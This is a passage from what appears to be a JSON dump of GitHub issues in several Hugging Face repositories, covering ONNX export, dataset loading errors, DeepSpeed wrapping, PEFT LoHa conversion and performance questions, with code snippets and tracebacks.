decoder_sequence_name,\r\n }\r\n\r\nmodel_id = \"THUDM/chatglm3-6b\"\r\nconfig = AutoConfig.from_pretrained(model_id, trust_remote_code=True) \r\n\r\nonnx_config = CustomChatGLM2OnnxConfig(\r\n config=config,\r\n task=\"text-generation\",\r\n use_past_in_inputs=False,\r\n )\r\nonnx_config_with_past = CustomChatGLM2OnnxConfig(\r\n config, task=\"text-generation\", use_past=True\r\n )\r\n\r\ncustom_onnx_configs = {\r\n \"model\": onnx_config,\r\n }\r\n\r\nmain_export(\r\n model_id,\r\n output=\"chatglm\",\r\n task=\"text-generation-with-past\",\r\n trust_remote_code=True,\r\n custom_onnx_configs=custom_onnx_configs,\r\n no_post_process=True,\r\n opset=15\r\n)\r\n\r\n### Running \r\n\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nfrom optimum.utils import NormalizedTextConfig, NormalizedConfigManager\r\nNormalizedConfigManager._conf[\"chatglm\"] = NormalizedTextConfig\r\n\r\nimport torch\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_id, 
trust_remote_code=True)\r\ntokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id, trust_remote_code=True)\r\n\r\nstart = time.perf_counter()\r\n\r\ninputs = tokenizer(\"What is the meaning of life?\", return_tensors=\"pt\", padding=True)\r\ninput_ids = inputs.input_ids\r\n\r\n# Generate\r\ngenerate_ids = model.generate(\r\n input_ids,\r\n max_length=64,\r\n pad_token_id=tokenizer.eos_token_id,\r\n )\r\n\r\n \r\n# Stop timer\r\nend = time.perf_counter()\r\ngenerate_time = end - start\r\n\r\n# Num of tokens\r\nprompt_tokens = input_ids.shape[1]\r\nnum_tokens_out = generate_ids.shape[1]\r\nnew_tokens_generated = num_tokens_out - prompt_tokens\r\n\r\ntime_per_token = (generate_time / new_tokens_generated) * 1e3\r\n\r\nprint(time_per_token)\r\n\r\n```", "url": "https://github.com/huggingface/optimum/issues/1846", "state": "open", "labels": [ "inference", "onnxruntime", "onnx" ], "created_at": "2024-05-06T17:18:58Z", "updated_at": "2024-10-14T12:25:29Z", "comments": 0, "user": "tuhinp-amd" }, { "repo": "huggingface/dataset-viewer", "number": 2775, "title": "Support LeRobot datasets?", "body": "Currently:\r\n\r\n```\r\nError code: ConfigNamesError\r\nException: ValueError\r\nMessage: Feature type 'VideoFrame' not found. Available feature types: ['Value', 'ClassLabel', 'Translation', 'TranslationVariableLanguages', 'Sequence', 'Array2D', 'Array3D', 'Array4D', 'Array5D', 'Audio', 'Image']\r\n```\r\n\r\neg on https://huggingface.co/datasets/lerobot/aloha_static_towel\r\n\r\nRequires datasets to support `VideoFrame`", "url": "https://github.com/huggingface/dataset-viewer/issues/2775", "state": "open", "labels": [ "question", "feature request", "dependencies", "P2" ], "created_at": "2024-05-06T09:16:40Z", "updated_at": "2025-07-24T03:36:41Z", "user": "severo" }, { "repo": "huggingface/peft", "number": 1712, "title": "how to finetune whisper model with 'initial_prompt'", "body": "when use 'initial_prompt', the decoding result of finetuning with my data on whisper model v2 is bad, on the contrary, the result is good.\r\nhowever, when use 'initial_prompt' the decoding result of based whisper model v2 is also good, so it means If want to use 'initial_prompt' during decoding , must add it when training\uff1f", "url": "https://github.com/huggingface/peft/issues/1712", "state": "closed", "labels": [], "created_at": "2024-05-06T06:28:20Z", "updated_at": "2024-06-13T15:03:43Z", "user": "zyb8543d" }, { "repo": "huggingface/dataspeech", "number": 17, "title": "UnboundLocalError: cannot access local variable 't' where it is not associated with a value \"\"\"", "body": "### What i do\r\n\r\n\r\nHello. I tried to annotate my own dataset. And I got an error that I don't understand.\r\nI'm a newbie. He is generally unable to understand what happened and why it happened.\r\n\r\nI am attaching all the materials that I have\r\n\r\nI have CSV-Scheme\r\n\r\n| audio | text | speeker_id |\r\n| ------------- | ------------- | ------------- |\r\n| ./audio/audio_427.wav | \u0422\u0435\u043a\u0441\u0442 \u043d\u0430 \u043a\u0438\u0440\u0438\u043b\u043b\u0438\u0446\u0435 | 1111 |\r\n\r\n\r\nI upload CSV and cast csv as written in the documentation.\r\nUploading to HgFace. I start dataspeech with arguments.\r\nHe loaded it, he started doing something, and then that was it.\r\n\r\n### What i group dataset\r\n\r\n```sh\r\npython group_dataset.py from_audio to_csv\r\n```\r\n\r\nOut. 
It save datasets.csv:\r\n\r\n```csv\r\n./audio/audio_427.wav, \u0430 \u0437\u0430\u0442\u0435\u043c \u0431\u0430\u0437\u0430\u043b\u044c\u0442\u0430!. ,1111\r\n./audio/audio_231.wav, razus!. ,1111\r\n```\r\n\r\n#### Cast and upload dataset to HG\r\n\r\n```sh\r\npython group_dataset.py from_csv cast_audio push_to_hub\r\n```\r\n\r\n```py\r\n# In short it does this >\r\n\r\ndf = Dataset.from_csv(\"./datasets.csv\")\r\ndf = df.cast_column(\"audio\", Audio(32000))\r\ndf.push_to_hub(repo_id=\"\", token=\"\")\r\n```\r\n\r\n### Start dataspeach\r\n\r\n```sh\r\npython main.py \"Anioji/testra\" \\\r\n--configuration \"default\" \\\r\n--output_dir /root/dataspeech/tmp_stone_base/ \\\r\n--text_column_name \"text_original\" \\\r\n--audio_column_name \"audio\" \\\r\n--cpu_num_workers 4 \\\r\n--num_workers_per_gpu 4 \\\r\n--rename_column \\\r\n```\r\n\r\n### Tracelog\r\n\r\n```pyhon\r\n/root/dataspeech/venv/lib/python3.11/site-packages/pyannote/audio/core/io.py:43: UserWarning: torchaudio._backend.set_audio_backend has been deprecated. With dispatcher enabled, this function is no-op. You can remove the function call.\r\n torchaudio.set_audio_backend(\"soundfile\")\r\nWARNING - torchvision is not available - cannot save figures\r\nCompute speaking rate\r\nCompute snr and reverb\r\nMap (num_proc=4): 0%| | 0/534 [00:00>> ds = load_dataset(\"google/fleurs\")\r\nValueError: Config name is missing.\r\nPlease pick one among the available configs: ['af_za', 'am_et', 'ar_eg', 'as_in', 'ast_es', 'az_az', 'be_by', 'bg_bg', 'bn_in', 'bs_ba', 'ca_es', 'ceb_ph', 'ckb_iq', 'cmn_hans_cn', 'cs_cz', 'cy_gb', 'da_dk', 'de_de', 'el_gr', 'en_us', 'es_419', 'et_ee', 'fa_ir', 'ff_sn', 'fi_fi', 'fil_ph', 'fr_fr', 'ga_ie', 'gl_es', 'gu_in', 'ha_ng', 'he_il', 'hi_in', 'hr_hr', 'hu_hu', 'hy_am', 'id_id', 'ig_ng', 'is_is', 'it_it', 'ja_jp', 'jv_id', 'ka_ge', 'kam_ke', 'kea_cv', 'kk_kz', 'km_kh', 'kn_in', 'ko_kr', 'ky_kg', 'lb_lu', 'lg_ug', 'ln_cd', 'lo_la', 'lt_lt', 'luo_ke', 'lv_lv', 'mi_nz', 'mk_mk', 'ml_in', 'mn_mn', 'mr_in', 'ms_my', 'mt_mt', 'my_mm', 'nb_no', 'ne_np', 'nl_nl', 'nso_za', 'ny_mw', 'oc_fr', 'om_et', 'or_in', 'pa_in', 'pl_pl', 'ps_af', 'pt_br', 'ro_ro', 'ru_ru', 'sd_in', 'sk_sk', 'sl_si', 'sn_zw', 'so_so', 'sr_rs', 'sv_se', 'sw_ke', 'ta_in', 'te_in', 'tg_tj', 'th_th', 'tr_tr', 'uk_ua', 'umb_ao', 'ur_pk', 'uz_uz', 'vi_vn', 'wo_sn', 'xh_za', 'yo_ng', 'yue_hant_hk', 'zu_za', 'all']\r\nExample of usage:\r\n\t`load_dataset('fleurs', 'af_za')`\r\n```\r\n\r\nNote the example of usage in the error message suggests loading \"fleurs\" instead of \"google/fleurs\".", "url": "https://github.com/huggingface/datasets/issues/6854", "state": "closed", "labels": [ "bug" ], "created_at": "2024-05-02T06:59:39Z", "updated_at": "2024-05-03T15:51:59Z", "comments": 0, "user": "albertvillanova" }, { "repo": "huggingface/distil-whisper", "number": 130, "title": "How to set the target language for examples in README?", "body": "The code examples in the README do not make it obvious how to set the language of the audio to transcribe. 
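For reference, a sketch of how the language is normally pinned on Whisper-style pipelines (the distil-whisper checkpoints themselves are English-only, so the multilingual `openai/whisper-small` and the audio path here are stand-ins):

```python
from transformers import pipeline

pipe = pipeline("automatic-speech-recognition", model="openai/whisper-small")

# generate_kwargs is forwarded to model.generate, which is where the
# language / task hints live for Whisper-style models.
out = pipe("sample.flac", generate_kwargs={"language": "french", "task": "transcribe"})
print(out["text"])
```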
\r\n\r\nThe default settings create garbled English text if the audio language is different.", "url": "https://github.com/huggingface/distil-whisper/issues/130", "state": "open", "labels": [], "created_at": "2024-05-01T11:52:00Z", "updated_at": "2024-05-22T11:59:09Z", "user": "clstaudt" }, { "repo": "huggingface/transformers", "number": 30596, "title": "AutoModel: how to enable TP for extremely large models?", "body": "Hi, I have 8 V100s, but a single one cannot fit the InternVL1.5 model, which has 28B parameters.\r\n\r\nSo I wonder: can I fit it across the 8 V100s with TP?\r\n\r\nI found that DeepSpeed can be used to do tensor parallelism like this:\r\n\r\n```\r\n# create the model\r\nif args.pre_load_checkpoint:\r\n model = model_class.from_pretrained(args.model_name_or_path)\r\nelse:\r\n model = model_class()\r\n...\r\n\r\nimport deepspeed\r\n\r\n# Initialize the DeepSpeed-Inference engine\r\nds_engine = deepspeed.init_inference(model,\r\n tensor_parallel={\"tp_size\": 2},\r\n dtype=torch.half,\r\n checkpoint=None if args.pre_load_checkpoint else args.checkpoint_json,\r\n replace_with_kernel_inject=True)\r\nmodel = ds_engine.module\r\noutput = model('Input String')\r\n```\r\n\r\nI didn't succeed, because it only supports built-in models that can be imported; for custom models that have to be loaded with `from_pretrained`, it does not work.\r\n\r\nBut as I mentioned at the start, my V100 will OOM when loading the model.\r\n\r\nIs there any convenient way to load a customized HF model with TP enabled?", "url": "https://github.com/huggingface/transformers/issues/30596", "state": "closed", "labels": [], "created_at": "2024-05-01T10:06:45Z", "updated_at": "2024-06-09T08:03:23Z", "user": "MonolithFoundation" }, { "repo": "huggingface/transformers", "number": 30595, "title": "i cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ ", "body": "### System Info\n\nI cannot find the code where the transformers Trainer's `model_wrapped` is wrapped by DeepSpeed. The docs say `model_wrapped` is DDP(DeepSpeed(transformer model)), but I only find the code where the model is wrapped by DDP. Where does the DeepSpeed wrapping happen? Thanks ^-^\n\n### Who can help?\n\nI cannot find the code where the transformers Trainer's `model_wrapped` is wrapped by DeepSpeed. The docs say `model_wrapped` is DDP(DeepSpeed(transformer model)), but I only find the code where the model is wrapped by DDP. Where does the DeepSpeed wrapping happen? Thanks ^-^\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI cannot find the code where the transformers Trainer's `model_wrapped` is wrapped by DeepSpeed. The docs say `model_wrapped` is DDP(DeepSpeed(transformer model)), but I only find the code where the model is wrapped by DDP. Where does the DeepSpeed wrapping happen? Thanks ^-^\n\n### Expected behavior\n\nI cannot find the code where the transformers Trainer's `model_wrapped` is wrapped by DeepSpeed. The docs say `model_wrapped` is DDP(DeepSpeed(transformer model)), but I only find the code where the model is wrapped by DDP. Where does the DeepSpeed wrapping happen? 
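\n\nA way to observe this at runtime (my own debugging sketch, not an official API): subclass `Trainer` and print the type of the model passed into `training_step`, which should be the DeepSpeed engine when a deepspeed config is active:\n\n```python\nfrom transformers import Trainer\n\nclass DebugTrainer(Trainer):\n    def training_step(self, model, inputs):\n        # with a deepspeed config, `model` and `model_wrapped` should be the wrapped engine\n        print(type(model), type(self.model_wrapped))\n        return super().training_step(model, inputs)\n```\n\n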
Thanks ^-^ ", "url": "https://github.com/huggingface/transformers/issues/30595", "state": "closed", "labels": [], "created_at": "2024-05-01T09:17:58Z", "updated_at": "2024-05-01T09:31:39Z", "user": "ldh127" }, { "repo": "huggingface/transformers.js", "number": 732, "title": "What does \"Error: failed to call OrtRun(). error code = 6.\" mean? I know it is ONNX related, but how to fix?", "body": "### Question\n\nI keep running into the same issue when using the transformers.js Automatic Speech Recognition pipeline. I've tried solving it multiple ways, but pretty much hit a wall every time. I've done lots of googling, asked LLMs, and used my prior knowledge of how this stuff functions in Python. But I can't seem to get it to work.\r\n\r\nI've tried setting up my environment with and without Vite. I've tried with React JavaScript. I've tried with React TypeScript. Nothing.\r\n\r\nAm I missing a dependency or something? Is there a place I can find what the error code means? Because I couldn't find it anywhere.\r\n\r\nI've fed it an array. I've fed it a .wav file. Nothing works. No matter what I do. No matter if it's an array or a wav file. I always get the same error:\r\n```\r\nAn error occurred during model execution: \"Error: failed to call OrtRun(). error code = 6.\".\r\nInputs given to model: {input_features: Proxy(Tensor)}\r\nError transcribing audio: Error: failed to call OrtRun(). error code = 6.\r\n at e.run (wasm-core-impl.ts:392:1)\r\n at e.run (proxy-wrapper.ts:212:1)\r\n at e.OnnxruntimeWebAssemblySessionHandler.run (session-handler.ts:99:1)\r\n at InferenceSession.run (inference-session-impl.ts:108:1)\r\n at sessionRun (models.js:207:1)\r\n at encoderForward (models.js:520:1)\r\n at Function.seq2seqForward [as _forward] (models.js:361:1)\r\n at Function.forward (models.js:820:1)\r\n at Function.seq2seqRunBeam [as _runBeam] (models.js:480:1)\r\n at Function.runBeam (models.js:1373:1)\r\n ```\r\n \r\nIt seems to be an ONNX Runtime issue, but I don't know how to fix it. Any guidance will be appreciated.\r\n\r\nNote: I'm currently testing with English. Nothing fancy.", "url": "https://github.com/huggingface/transformers.js/issues/732", "state": "closed", "labels": [ "question" ], "created_at": "2024-05-01T07:01:06Z", "updated_at": "2024-05-11T09:18:35Z", "user": "jquintanilla4" }, { "repo": "huggingface/transformers", "number": 30591, "title": "i cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ ", "body": "### Feature request\r\n\r\nI cannot find the code where the transformers Trainer's `model_wrapped` is wrapped by DeepSpeed. The docs say `model_wrapped` is DDP(DeepSpeed(transformer model)), but I only find the code where the model is wrapped by DDP. Where does the DeepSpeed wrapping happen? Thanks ^-^\r\n\r\n### Motivation\r\n\r\nx\r\n\r\n### Your contribution\r\n\r\nx", "url": "https://github.com/huggingface/transformers/issues/30591", "state": "closed", "labels": [], "created_at": "2024-05-01T04:27:47Z", "updated_at": "2024-06-08T08:03:17Z", "user": "ldh127" }, { "repo": "huggingface/chat-ui", "number": 1093, "title": "I want to get the html of a website https://bit.ly/4bgmLb9 in huggingchat web search", "body": "I want to get the html of a website https://bit.ly/4bgmLb9 in hugging-chat web search. 
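\r\n\r\n(Outside of chat-ui, fetching the raw html is trivial. For illustration, in Python:\r\n\r\n```python\r\nimport requests\r\n\r\n# follows the bit.ly redirect and returns the final page's html\r\nhtml = requests.get(\"https://bit.ly/4bgmLb9\", timeout=10).text\r\nprint(html[:200])\r\n```\r\n\r\nI would like the web search feature to do the equivalent.)\r\n\r\n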
In Chrome, I can put https://bit.ly/4bgmLb9 in the address bar and get the result, but I do not know how to do that in hugging-chat web search.\r\n\r\nI tried it in hugging-chat; here is the screenshot:\r\n![tmp](https://github.com/huggingface/chat-ui/assets/124528204/89ca5f28-9dc9-479c-a6f0-9c096e8ea0d6)\r\n\r\nHow should I write the prompt so that HuggingChat can fulfill this requirement?", "url": "https://github.com/huggingface/chat-ui/issues/1093", "state": "closed", "labels": [], "created_at": "2024-05-01T03:00:29Z", "updated_at": "2024-05-02T14:26:16Z", "comments": 1, "user": "ghost" }, { "repo": "huggingface/dataset-viewer", "number": 2756, "title": "Upgrade pyarrow to 16?", "body": "Release notes here: https://arrow.apache.org/blog/2024/04/20/16.0.0-release/\r\n\r\nAre we affected by any change? Does it enable something for us?", "url": "https://github.com/huggingface/dataset-viewer/issues/2756", "state": "open", "labels": [ "question", "dependencies", "P2" ], "created_at": "2024-04-30T10:20:45Z", "updated_at": "2024-04-30T16:19:31Z", "user": "severo" }, { "repo": "huggingface/peft", "number": 1693, "title": "How to convert a loha safetensor trained from diffusers to webui format", "body": "Hello, when I fine-tune SDXL (actually InstantID) with PEFT methods, I use LoRA, LoHa and LoKr in [diffusers](https://github.com/huggingface/diffusers).\r\nI have a question: how do I convert a LoHa safetensors file trained with diffusers to the webui format?\r\nIn the training process, the config is loaded as:\r\n`peft_config = LoHaConfig(\r\n r=args.rank,\r\n alpha=args.rank //2,\r\n target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\r\n ) `\r\n`unet = get_peft_model(unet, peft_config)\r\n`\r\nWhen the training process finished, I saved it as:\r\n`unet.save_pretrained(args.output_dir)`\r\n\r\nand I get the safetensors file as\r\n![image](https://github.com/KohakuBlueleaf/LyCORIS/assets/61881733/f71caa9a-4935-40f8-84fb-0a18d19991ac)\r\n\r\nBut [webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui/) can't recognize it, so I can't use it in webui.\r\n\r\nHow can I fix this problem?\r\n", "url": "https://github.com/huggingface/peft/issues/1693", "state": "closed", "labels": [], "created_at": "2024-04-30T07:17:48Z", "updated_at": "2024-06-08T15:03:44Z", "user": "JIAOJIAYUASD" }, { "repo": "huggingface/safetensors", "number": 474, "title": "How to fully load checkpointed weights in memory? ", "body": "### System Info\r\n\r\n\r\n- `transformers` version: 4.40.0\r\n- Platform: Linux-5.15.0-105-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.22.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.25.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.2+cu121 (True)\r\n- Tensorflow version (GPU?): 2.16.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.8.2 (cpu)\r\n- Jax version: 0.4.26\r\n- JaxLib version: 0.4.21\r\n\r\n### Reproduction\r\n\r\n1. Load a checkpointed `.safetensor` file using the `safetensors.torch.load_file` API in the CPU memory. \r\n2. Negligible increase in the CPU memory usage\r\n\r\n### Expected behavior\r\n\r\nThe CPU memory should increase by exactly the size of the file being read. \r\n\r\nI think the negligible increase in the CPU memory might be the expected behavior, due to safetensors' lazy loading feature? However, if I want to load the entire model in host memory, is there another way to do that? I am running some benchmarks with safetensors APIs, and need to ensure that the model is fully loaded in the CPU memory. 
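\r\n\r\nThe workaround I am currently considering (a sketch; I have not verified this is the intended usage): read the whole file into a bytes buffer and deserialize it with `safetensors.torch.load`, which should bypass the mmap-based lazy loading of `load_file`:\r\n\r\n```python\r\nfrom safetensors.torch import load\r\n\r\nwith open(\"model.safetensors\", \"rb\") as f:\r\n    data = f.read()  # forces the full file into host memory\r\n\r\nstate_dict = load(data)  # tensors are backed by the in-memory buffer\r\n```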
", "url": "https://github.com/huggingface/safetensors/issues/474", "state": "closed", "labels": [], "created_at": "2024-04-29T21:30:37Z", "updated_at": "2024-04-30T22:12:29Z", "user": "goelayu" }, { "repo": "huggingface/dataset-viewer", "number": 2754, "title": "Return partial dataset-hub-cache instead of error?", "body": "`dataset-hub-cache` depends on multiple previous steps, and any error in one of them makes it fail. It provokes things like https://github.com/huggingface/moon-landing/issues/9799 (internal): in the datasets list, a dataset is not marked as \"supporting the dataset viewer\", whereas the only issue is that we didn't manage to list the compatible libraries, to create the tags.\r\n\r\nhttps://github.com/huggingface/dataset-viewer/blob/main/services/worker/src/worker/job_runners/dataset/hub_cache.py\r\n\r\nIn this case, we could return a partial response, or maybe return an empty list of libraries or modalities if we have an error.\r\n\r\nWhat do you think @lhoestq?\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2754", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-29T17:10:09Z", "updated_at": "2024-06-13T13:57:20Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6848, "title": "Cant Downlaod Common Voice 17.0 hy-AM ", "body": "### Describe the bug\r\n\r\nI want to download Common Voice 17.0 hy-AM but it returns an error. \r\n```\r\n\r\nThe version_base parameter is not specified.\r\nPlease specify a compatability version level, or None.\r\nWill assume defaults for version 1.1\r\n @hydra.main(config_name='hfds_config', config_path=None)\r\n/usr/local/lib/python3.10/dist-packages/hydra/_internal/hydra.py:119: UserWarning: Future Hydra versions will no longer change working directory at job runtime by default.\r\nSee https://hydra.cc/docs/1.2/upgrades/1.1_to_1.2/changes_to_job_working_dir/ for more information.\r\n ret = run_job(\r\n/usr/local/lib/python3.10/dist-packages/datasets/load.py:1429: FutureWarning: The repository for mozilla-foundation/common_voice_17_0 contains custom code which must be executed to correctly load the dataset. You can inspect the repository content at https://hf.co/datasets/mozilla-foundation/common_voice_17_0\r\nYou can avoid this message in future by passing the argument `trust_remote_code=True`.\r\nPassing `trust_remote_code=True` will be mandatory to load this dataset from the next major release of `datasets`.\r\n warnings.warn(\r\nReading metadata...: 6180it [00:00, 133224.37it/s]les/s]\r\nGenerating train split: 0 examples [00:00, ? 
examples/s]\r\nHuggingFace datasets failed due to some reason (stack trace below).\r\nFor certain datasets (eg: MCV), it may be necessary to login to the huggingface-cli (via `huggingface-cli login`).\r\nOnce logged in, you need to set `use_auth_token=True` when calling this script.\r\n\r\nTraceback error for reference :\r\n\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1743, in _prepare_split_single\r\n example = self.info.features.encode_example(record) if self.info.features is not None else record\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1878, in encode_example\r\n return encode_nested_example(self, example)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1243, in encode_nested_example\r\n {\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1243, in \r\n {\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 326, in zip_dict\r\n yield key, tuple(d[key] for d in dicts)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 326, in \r\n yield key, tuple(d[key] for d in dicts)\r\nKeyError: 'sentence_id'\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/workspace/nemo/scripts/speech_recognition/convert_hf_dataset_to_nemo.py\", line 358, in main\r\n dataset = load_dataset(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/load.py\", line 2549, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1005, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1767, in _download_and_prepare\r\n super()._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1100, in _download_and_prepare\r\n self._prepare_split(split_generator, **prepare_split_kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1605, in _prepare_split\r\n for job_id, done, content in self._prepare_split_single(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1762, in _prepare_split_single\r\n raise DatasetGenerationError(\"An error occurred while generating the dataset\") from e\r\ndatasets.exceptions.DatasetGenerationError: An error occurred while generating the dataset\r\n```\r\n\r\n### Steps to reproduce the bug\r\n\r\n```\r\nfrom datasets import load_dataset\r\n\r\ncv_17 = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"hy-AM\")\r\n```\r\n\r\n### Expected behavior\r\n\r\nIt works fine with common_voice_16_1\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.18.0\r\n- Platform: Linux-5.15.0-1042-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.11.6\r\n- `huggingface_hub` version: 0.22.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.2.0", "url": "https://github.com/huggingface/datasets/issues/6848", "state": "open", "labels": [], "created_at": "2024-04-29T10:06:02Z", "updated_at": "2025-04-01T20:48:09Z", "comments": 3, "user": "mheryerznkanyan" }, { "repo": "huggingface/optimum", "number": 1839, "title": "why does ORTModelForCausalLM assume new input length is 1 when past_key_values is passed", "body": 
"https://github.com/huggingface/optimum/blob/c55f8824f58db1a2f1cfc7879451b4743b8f206b/optimum/onnxruntime/modeling_decoder.py#L649\r\n\r\n``` python\r\n def prepare_inputs_for_generation(self, input_ids, past_key_values=None, **kwargs):\r\n if past_key_values is not None:\r\n past_length = past_key_values[0][0].shape[2]\r\n # Some generation methods already pass only the last input ID\r\n if input_ids.shape[1] > past_length:\r\n remove_prefix_length = past_length\r\n else:\r\n # Default to old behavior: keep only final ID\r\n remove_prefix_length = input_ids.shape[1] - 1\r\n input_ids = input_ids[:, remove_prefix_length:]\r\n\r\n```\r\n\r\nwhile in non-onnx modeling, it's not.\r\n\r\nhttps://github.com/huggingface/transformers/blob/a98c41798cf6ed99e1ff17e3792d6e06a2ff2ff3/src/transformers/models/mistral/modeling_mistral.py#L1217\r\n\r\n```python\r\n # Keep only the unprocessed tokens:\r\n # 1 - If the length of the attention_mask exceeds the length of input_ids, then we are in a setting where\r\n # some of the inputs are exclusively passed as part of the cache (e.g. when passing input_embeds as\r\n # input)\r\n if attention_mask is not None and attention_mask.shape[1] > input_ids.shape[1]:\r\n input_ids = input_ids[:, -(attention_mask.shape[1] - past_length) :]\r\n # 2 - If the past_length is smaller than input_ids', then input_ids holds all input tokens. We can discard\r\n # input_ids based on the past_length.\r\n elif past_length < input_ids.shape[1]:\r\n input_ids = input_ids[:, past_length:]\r\n```", "url": "https://github.com/huggingface/optimum/issues/1839", "state": "open", "labels": [ "question", "onnxruntime" ], "created_at": "2024-04-29T07:06:04Z", "updated_at": "2024-10-14T12:28:51Z", "user": "cyh-ustc" }, { "repo": "huggingface/diffusers", "number": 7813, "title": "I feel confused about this TODO issue. how to pass timesteps as tensors? 
", "body": "https://github.com/huggingface/diffusers/blob/235d34cf567e78bf958344d3132bb018a8580295/src/diffusers/models/unets/unet_2d_condition.py#L918\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/7813", "state": "closed", "labels": [ "stale" ], "created_at": "2024-04-29T03:46:21Z", "updated_at": "2024-11-23T00:19:17Z", "user": "ghost" }, { "repo": "huggingface/datasets", "number": 6846, "title": "Unimaginable super slow iteration", "body": "### Describe the bug\r\n\r\nAssuming there is a dataset with 52000 sentences, each with a length of 500, it takes 20 seconds to extract a sentence from the dataset\u2026\u2026\uff1fIs there something wrong with my iteration?\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nimport datasets\r\nimport time\r\nimport random\r\n\r\nnum_rows = 52000\r\nnum_cols = 500\r\n\r\nrandom_input = [[random.randint(1, 100) for _ in range(num_cols)] for _ in range(num_rows)]\r\nrandom_output = [[random.randint(1, 100) for _ in range(num_cols)] for _ in range(num_rows)]\r\n\r\n\r\ns=time.time()\r\nd={'random_input':random_input,'random_output':random_output}\r\ndataset=datasets.Dataset.from_dict(d)\r\nprint('from dict',time.time()-s)\r\nprint(dataset)\r\n\r\n\r\nfor i in range(len(dataset)):\r\n aa=time.time()\r\n a,b=dataset['random_input'][i],dataset['random_output'][i]\r\n print(time.time()-aa)\r\n\r\n```\r\n\r\ncorresponding output\r\n```bash\r\nfrom dict 9.215498685836792\r\nDataset({\r\n features: ['random_input', 'random_output'],\r\n num_rows: 52000\r\n})\r\n19.129778146743774\r\n19.329464197158813\r\n19.27668261528015\r\n19.28557538986206\r\n19.247620582580566\r\n19.624247074127197\r\n19.28673791885376\r\n19.301053047180176\r\n19.290496110916138\r\n19.291821718215942\r\n19.357765197753906\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nUnder normal circumstances, iteration should be very rapid as it does not involve the main tasks other than getting items\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.19.0\r\n- Platform: Linux-3.10.0-1160.71.1.el7.x86_64-x86_64-with-glibc2.17\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.21.4\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.1\r\n- `fsspec` version: 2024.2.0", "url": "https://github.com/huggingface/datasets/issues/6846", "state": "closed", "labels": [], "created_at": "2024-04-28T05:24:14Z", "updated_at": "2024-05-06T08:30:03Z", "comments": 1, "user": "rangehow" }, { "repo": "huggingface/lerobot", "number": 112, "title": "Do we want to use `transformers`?", "body": "I'd really go against establishing transformers as a dependency of lerobot and importing their whole library just to use the `PretrainedConfig` (or even other components). I think in this case it's very overkill and wouldn't necessarily fit our needs right now. 
The class is ~1000 lines of code - which we can copy into our lib anyway - and looks way more mature and feature-rich than what \u2014 IMO \u2014 we need and have with the rest of our code base.\r\n\r\nCopying code is even part of [Transformers' philosophy](https://huggingface.co/blog/transformers-design-philosophy) \u2014 which we *do* copy.\r\n\r\n_Originally posted by @aliberts in https://github.com/huggingface/lerobot/pull/101#discussion_r1581860998_\r\n ", "url": "https://github.com/huggingface/lerobot/issues/112", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-27T17:24:20Z", "updated_at": "2024-04-30T11:59:25Z", "user": "qgallouedec" }, { "repo": "huggingface/evaluate", "number": 582, "title": "How to pass generation_kwargs to the TextGeneration evaluator ?", "body": "How can I pass the generation_kwargs to the TextGeneration evaluator?", "url": "https://github.com/huggingface/evaluate/issues/582", "state": "open", "labels": [], "created_at": "2024-04-25T16:09:46Z", "updated_at": "2024-04-25T16:09:46Z", "user": "swarnava112" }, { "repo": "huggingface/chat-ui", "number": 1074, "title": "503 error ", "body": "Hello, I was trying to install chat-ui on my VPS and searched for documentation on how to handle this.\r\nI get a 500 error after the build, and it does not work with https although allow_insecure=false. ", "url": 